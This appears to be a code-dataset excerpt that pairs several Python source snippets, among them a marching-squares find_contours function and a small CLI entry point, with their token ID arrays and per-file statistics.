... stdout=stdout.writer,
... stderr=stdout.writer
... )
...
... # Close writer end so we can read form it
... stdout.writer.close()
...
... # Read node output
... stdout.reader.read().decode().strip()
'hello'
>>>
The three parameters ``stdin``, ``stdout`` or ``stderr`` are provided as a convenience
for writing unit tests when you can't use ``sys.stdin`` or ``sys.stdout``, or simply
when you want to be able to read from the output.
:param argv: command line arguments
:param stdin: input stream
:param stdout: output stream
:param stderr: error stream
"""
argv = sys.argv if argv is None else argv
parser = argparse.ArgumentParser(prog="Service", description="Help")
parser.add_argument("node", type=str, help="command name")
parser.add_argument(
"argv", type=str, nargs=argparse.REMAINDER, help="additional CLI arguments"
)
parser.add_argument("-v", "--verbose", action="store_true", help="Verbosity level")
args = parser.parse_args(args=argv[1:])
node_argv, gada_argv = split_unknown_args(args.argv)
run(node=args.node, argv=node_argv, stdin=stdin, stdout=stdout, stderr=stderr)
if __name__ == "__main__":
main(sys.argv)
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
198,
834,
439,
834,
796,
14631,
5143,
1600,
366,
12417,
8973,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
33245,
198,
11748,
1822,
29572,
198,
6738,
19720,
1330,
32233,
198,
6738,
308,
4763... | 2.159314 | 2,448 |
import numpy as np
from . import _find_contours
from collections import deque
_param_options = ('high', 'low')
def find_contours(array, level,
fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value.
Uses the "marching squares" method to compute a the iso-valued contours of
the input 2D array for a particular level value. Array values are linearly
interpolated to provide better precision for the output contours.
Parameters
----------
array : 2D ndarray of double
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str, {'low', 'high'}
Indicates whether array elements below the given level value are to be
considered fully-connected (and hence elements above the value will
only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : either 'low' or 'high'
Indicates whether the output contours will produce positively-oriented
polygons around islands of low- or high-valued elements. If 'low' then
contours will wind counter- clockwise around elements below the
iso-value. Alternately, this means that low-valued elements are always
on the left of the contour. (See below for details.)
Returns
-------
contours : list of (n,2)-ndarrays
Each contour is an ndarray of shape ``(n, 2)``,
consisting of n ``(x, y)`` coordinates along the contour.
Notes
-----
The marching squares algorithm is a special case of the marching cubes
algorithm [1]_. A simple explanation is available here::
http://www.essi.fr/~lingrand/MarchingCubes/algo.html
There is a single ambiguous case in the marching squares algorithm: when
a given ``2 x 2``-element square has two high-valued and two low-valued
elements, each pair diagonally adjacent. (Where high- and low-valued is
with respect to the contour value sought.) In this case, either the
high-valued elements can be 'connected together' via a thin isthmus that
separates the low-valued elements, or vice-versa. When elements are
connected together across a diagonal, they are considered 'fully
connected' (also known as 'face+vertex-connected' or '8-connected'). Only
high-valued or low-valued elements can be fully-connected, the other set
will be considered as 'face-connected' or '4-connected'. By default,
low-valued elements are considered fully-connected; this can be altered
with the 'fully_connected' parameter.
Output contours are not guaranteed to be closed: contours which intersect
the array edge will be left open. All other contours will be closed. (The
closed-ness of a contours can be tested by checking whether the beginning
point is the same as the end point.)
Contours are oriented. By default, array values lower than the contour
value are to the left of the contour and values greater than the contour
value are to the right. This means that contours will wind
counter-clockwise (i.e. in 'positive orientation') around islands of
low-valued pixels. This behavior can be altered with the
'positive_orientation' parameter.
The order of the contours in the output list is determined by the position
of the smallest ``x,y`` (in lexicographical order) coordinate in the
contour. This is a side-effect of how the input array is traversed, but
can be relied upon.
.. warning::
Array coordinates/values are assumed to refer to the *center* of the
array element. Take a simple example input: ``[0, 1]``. The interpolated
position of 0.5 in this array is midway between the 0-element (at
``x=0``) and the 1-element (at ``x=1``), and thus would fall at
``x=0.5``.
This means that to find reasonable contours, it is best to find contours
midway between the expected "light" and "dark" values. In particular,
given a binarized array, *do not* choose to find contours at the low or high
value of the array. This will often yield degenerate contours, especially
around structures that are a single array element wide. Instead choose
a middle value, as above.
References
----------
.. [1] Lorensen, William and Harvey E. Cline. Marching Cubes: A High
Resolution 3D Surface Construction Algorithm. Computer Graphics
(SIGGRAPH 87 Proceedings) 21(4) July 1987, p. 163-170).
"""
array = np.asarray(array, dtype=np.double)
if array.ndim != 2:
raise RuntimeError('Only 2D arrays are supported.')
level = float(level)
if (fully_connected not in _param_options or
positive_orientation not in _param_options):
raise ValueError('Parameters "fully_connected" and'
' "positive_orientation" must be either "high" or "low".')
point_list = _find_contours.iterate_and_store(array, level,
fully_connected == 'high')
contours = _assemble_contours(_take_2(point_list))
if positive_orientation == 'high':
contours = [c[::-1] for c in contours]
return contours
| [
11748,
299,
32152,
355,
45941,
198,
6738,
764,
1330,
4808,
19796,
62,
3642,
4662,
198,
198,
6738,
17268,
1330,
390,
4188,
198,
198,
62,
17143,
62,
25811,
796,
19203,
8929,
3256,
705,
9319,
11537,
198,
198,
4299,
1064,
62,
3642,
4662,
... | 3.156532 | 1,661 |
import logging
from zygoat.utils.files import repository_root
from zygoat.config import Config
log = logging.getLogger()
| [
11748,
18931,
198,
198,
6738,
1976,
88,
2188,
265,
13,
26791,
13,
16624,
1330,
16099,
62,
15763,
198,
6738,
1976,
88,
2188,
265,
13,
11250,
1330,
17056,
198,
198,
6404,
796,
18931,
13,
1136,
11187,
1362,
3419,
628
] | 3.263158 | 38 |
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import TypeVar
import dataclasses
from .page_position import PagePosition
T = TypeVar('T')
@dataclasses.dataclass(frozen=True)
| [
6738,
19720,
1330,
42044,
198,
6738,
19720,
1330,
40806,
540,
198,
6738,
19720,
1330,
40806,
1352,
198,
6738,
19720,
1330,
5994,
19852,
198,
198,
11748,
4818,
330,
28958,
198,
198,
6738,
764,
7700,
62,
9150,
1330,
7873,
26545,
198,
198,
... | 3.546875 | 64 |